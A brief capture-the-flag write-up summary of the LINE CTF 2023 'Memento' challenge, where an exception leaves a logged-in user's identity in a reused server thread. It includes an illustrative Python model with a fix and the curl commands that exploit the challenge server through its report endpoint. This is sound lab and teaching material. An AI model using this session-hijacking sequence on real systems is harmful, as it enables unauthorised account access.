[https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-linectf-2023.html](https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-linectf-2023.html)

Tl;dr: The application stores the currently logged-in user in a thread-local
variable whose lifetime persists beyond the HTTP request. Normally it is cleared
at the end of each request, but if you trigger an exception it is not, and you
continue to be logged in as that user in the next request served by the same
thread, even without their cookie. You can trigger an exception by reporting a
URL with %7f in it.
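The bug class described in the Tl;dr, modeled in Python beside its fix. This is an added example, not code from the challenge or the original writeup; the handler names, session table and single-worker pool are assumptions made for illustration.

```python
import threading
from concurrent.futures import ThreadPoolExecutor

# Constructed model of the bug class; every name here is hypothetical.
_ctx = threading.local()              # per-thread state that outlives a request
SESSIONS = {"cookie-alice": "alice"}  # constructed session table


def _work(path):
    """Stand-in for request processing; fails on a malformed path."""
    if "\x7f" in path:
        raise ValueError("invalid character in path")
    return getattr(_ctx, "user", None)  # the user this request runs as


def handle_vulnerable(cookie, path):
    """Clears the thread-local only on the success path."""
    if cookie in SESSIONS:
        _ctx.user = SESSIONS[cookie]
    result = _work(path)
    _ctx.user = None                  # skipped when _work() raises
    return result


def handle_fixed(cookie, path):
    """Resets on entry and clears in finally, so no exit path leaks state."""
    _ctx.user = SESSIONS.get(cookie)
    try:
        return _work(path)
    finally:
        _ctx.user = None


def replay(handler):
    """Authenticated failing request, then an anonymous one, on one worker."""
    with ThreadPoolExecutor(max_workers=1) as pool:  # one reused thread
        first = pool.submit(handler, "cookie-alice", "/bin/\x7f")
        failed = first.exception() is not None
        second = pool.submit(handler, None, "/bin/list").result()
    return failed, second


if __name__ == "__main__":
    print("vulnerable:", replay(handle_vulnerable))
    print("fixed:     ", replay(handle_fixed))
```

The fixed handler applies two independent safeguards: it overwrites the identity at the start of every request and clears it in `finally`, so a stale value cannot survive either an exception or a missed cleanup.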

The solution looks like:

`curl 'http://176.17.0.1:10000/bin/report?urlString=http://176.17.0.1:10000/bin/report%253furlString=http://176.17.0.1:10000/bin/%257f'`

followed by

`curl 'http://34.84.65.148:31337/bin/list'`

Repeat these steps multiple times, as the server has multiple threads.

Please see [https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-linectf-2023.html](https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-linectf-2023.html) for full details.
